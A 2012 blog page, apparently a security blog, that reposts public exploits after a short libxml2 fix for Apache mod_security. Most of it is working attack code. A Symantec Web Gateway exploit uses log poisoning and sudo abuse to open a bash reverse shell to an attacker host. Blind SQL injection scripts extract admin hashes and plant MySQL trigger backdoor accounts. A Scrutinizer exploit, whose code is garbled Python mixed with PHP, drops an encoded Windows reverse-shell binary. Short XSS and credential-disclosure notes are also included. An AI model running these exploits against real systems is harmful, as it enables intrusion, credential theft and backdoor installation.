Jul 28, 2012

Howto: Fix the error Mod_Security[libxml2.so.2] on Ubuntu12.04

# aptitude download libxml2
# ar -xf libxml2_2.7.8.dfsg-5.1ubuntu4_amd64.deb
the following files will be extract from ubuntu package.
control.tar.gz data.tar.gz debian-binary libxml2_2.7.8.dfsg-5.1ubuntu4_amd64.deb
# rm libxml2_2.7.8.dfsg-5.1ubuntu4_amd64.deb control.tar.gz
# tar xf data.tar.gz
# cd usr/lib/x86_64-linux-gnu/
# ls
libxml2.so.2 libxml2.so.2.7.8
# mv * /usr/lib/x86_64-linux-gnu/
# cp /usr/lib/x86_64-linux-gnu/libxml2.so.2* /usr/lib/
# /etc/init.d/apache2 start
* Starting web server apache2 [ OK ]


Source: http://knowledge-republic.com/CRM/2012/05/ubuntu-12-04-missing-libxml2-so-2-file-mod-security2/

If you like my blog, Please Donate Me

Jul 27, 2012

Transmission BitTorrent XSS Vulnerability

Proof of Concept Exploit:
- -------------------------
1.  Create a malicious torrent file (Example below) that includes
arbitrary script elements in the name, comment, or authored by elements.
2.  Install and start up the Transmission client
3.  In Transmission select Edit->Preferences then click the 'Web' tab
4.  Check the 'Enable web client'
5.  Open a web browser and navigate to the web based client
6.  Click the 'Open Torrent' icon in the upper left and select the
malicious file from step #1
7.  Highlight the torrent and click the 'Toggle Inspector' icon in the
upper left.
8.  Mouse over the "Mouse over me" sections in the information pane to
view the rendered JavaScript alert boxes.
 
Source: http://seclists.org/fulldisclosure/2012/Jul/348 



If you like my blog, Please Donate Me

Jul 24, 2012

Nessus app for android version 1.0.1 Credential Disclosure

Nessus app for android
version 1.0.1

The app allows user to save nessus server info 
IP/username/password.

The app saves this info to
/sdcard/servers.id

This file can be viewed with notepad and password is right there in plain text. 
this means any app on the system can see that info and possibly transmit it to an attacker.





Source: http://1337day.com/exploits/19052

If you like my blog, Please Donate Me

Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit

#!/usr/bin/python

'''

The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the
/tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply
recreate the file and obtain a root shell using a different LFI vulnerability.

Timeline:

# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure

'''

import socket
import sys
import base64

print "[*] #########################################################"
print "[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] #########################################################\n"

if (len(sys.argv) != 4):
 print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
 exit(0)

rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]

# Base64 encoded bash reverse shell
# Payload does sudo-fu abuse of sudoable /tmp/networkScript with apache:apache permissions

payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/'''+lhost+'/' + lport 
payload+=''' 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")

taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
trigger="GET /spywall/languageTest.php?&language=../../../../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"

print "[*] Super Sudo Backdoor injection, w00t"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(taint)
expl.close()

print "[*] Triggering Payload ...3,2,1 "
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((rhost, 80))
expl.send(trigger)
expl.close()
print "[*] Can you haz shell on %s %s ?\n" % (lhost,lport)
 
Source: http://www.exploit-db.com/exploits/20064/ 


If you like my blog, Please Donate Me

Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection

#!/usr/bin/python
 
######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.2
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 29 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################
 
import urllib
import time
import sys
from time import sleep
 
# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.
# This might need to be higher on production systems.
 
timing=300
 
def check_char(i,j,timing):
 
    url =   ("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +
        " or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+
        "= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)
    start=time.time()
    urllib.urlopen(url)
    end =time.time()
    howlong=int(end-start)
    return howlong
 
counter=0
startexploit=time.time()
print "[*] Symantec \"Wall of Spies\" hash extractor"
print "[*] Time Based SQL injection, please wait..."
sys.stdout.write("[*] Admin hash is : ")
sys.stdout.flush()
 
for m in range(1,33):
    for n in range(0,16):
        counter= counter+1
        output = check_char(n,m,timing)
        if output > ((timing/100)-1):
            byte =hex(n)[2:]
            sys.stdout.write(byte)
            sys.stdout.flush()
            break
endexploit=time.time()
totalrun=str(endexploit-startexploit)
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)
 
Source: http://1337day.com/exploits/19045 


If you like my blog, Please Donate Me

Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers

######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.3.18
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 12 Jun 2012: Vulnerability reported to CERT
# 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec issued patch: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################


Accessing the following URLs will create a new trigger that will create a user account on the victim database:

https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '/var/lib/mysql/spywall_db/ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';--

https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/spywall_db/eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","hacker@offsec.com","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';--

https://server/spywall/scheduledReboot.php
 
Source: http://www.exploit-db.com/exploits/20044/ 


If you like my blog, Please Donate Me

Jul 23, 2012

Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection

#!/usr/bin/python

######################################################################################
# Exploit Title: Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection
# Date: Jul 22 2012
# Author: muts
# Version: SonicWALL Scrutinizer 9.0.1
# Vendor URL: http://www.sonicwall.com
#
# Special thanks to: Tal Zeltzer
#
# Timeline:
#
# 12 Jun 2012: Vulnerability reported to CERT
# 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 22 Jul 2012: Public Disclosure
#
######################################################################################



import sys,urllib2,urllib

#php = "<?php echo system($_GET['c']); ?>"

$rhost="172.16.164.1";
$lport=4444;
function encode_ip($user_ip) {
    $ip = explode('.', $user_ip);
    return sprintf('%02x%02x%02x%02x', $ip[0], $ip[1], $ip[2], $ip[3]);
}
$string='4D5A900003Y004Y0FFFF0000B8YY00004ZZYY0BY000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24YY00005DCF9F8719AEF1D419AEF1D419AEF1D497B1E2D413AEF1D4E58EE3D418AEF1D45269636819AEF1D4YYY0504500004C0103000CF9E94FYYY0E0000F010B01050C0002Y006YY00001Y001Y002Y00004Y1Y0002Y4YYY4YYY04Y0004YY0002YY1Y1Y00001Y1YY0001YYYY0001C2Y3CZZZZZYYY0002Y1CZYYYY00002E74657874Y0B8Y0001Y0002Y004YYYYY0002Y602E72646174610000D4Y0002Y0002Y006YYYYY0004Y402E64617461Y00202Y03Y0002Y008YYYYY0004YCZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ066C7059E314000020066C705A0314000'. dechex($lport).'C705A2314000'. encode_ip($rhost). 'C705AE31400044Y0C705DA314Y01000068103040006801010000E86DY06A006A006A006A066A016A02E856Y08BF86A10689E31400057E853Y0893DE6314000893DEA314000893DEE31400068F231400068AE3140006A006A006A006A016A006A0068003040006A00E807Y06A00E806Y0FF2504204000FF2500204000FF2514204000FF250C204000FF2510204ZZZZZZZZZZZZZZZZZZZZZYYYYY0000862Y742YY000B02YBE2YA22YY000582YYYY0942Y002Y642YYYY0C82Y0C2ZYYY862Y742YY000B02YBE2YA22YY0004F0043726561746550726F636573734100009B004578697450726F63657373006B65726E656C33322E646C6C00004100575341536F636B657441000043005753415374617274757Y5600636F6E6E656374007773325F33322E646C6CZZZZZZZZZZZZZZZZZZZZ0000636D64ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZYYYYY000';
$a=str_replace("Z","000000000000000000000000000000",$string);
$php=str_replace("Y","00000",$a);

def exploit_mysql(target, phpScript):
    target += '/d4d/statusFilter.php'
    req = urllib2.Request(url = target)
    query = "AAA' " # First escape the sql query leaving everything valid
                    # then we dump the php-script into the web-server's directory
    query += "union select 0x%s,0 into outfile 'C:\\\\Program Files\\\\Scrutinizer\\\\html\\\\my.php'" % phpScript.encode('hex')
    query += "#"    # And finally we terminate the query 
    values = { 'commonJson': 'protList',
               'q': query
               }
    req.add_data(urllib.urlencode(values))
    try:
        response = urllib2.urlopen(req)
    except:
        return(False)
    body = response.read()
#    print body
    if "No Results Found" in body:
        return(True)
    return(False)

if len(sys.argv) != 2:
	print "Usage: " + sys.argv[0] + " " + "http://www.example.com:8080/"
	sys.exit(0)

target = sys.argv[1]

print '[*] Trying to SQL inject on %s' % target
if exploit_mysql(target, php) == True:
        print '[*] Created a backdoor at %smy.php' % target
	urllib.urlopen('%smy.php' % target)

else:
        print '[*] Failed to backdoor the server'
 
Source: www.exploit-db.com/exploits/20033/ 


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |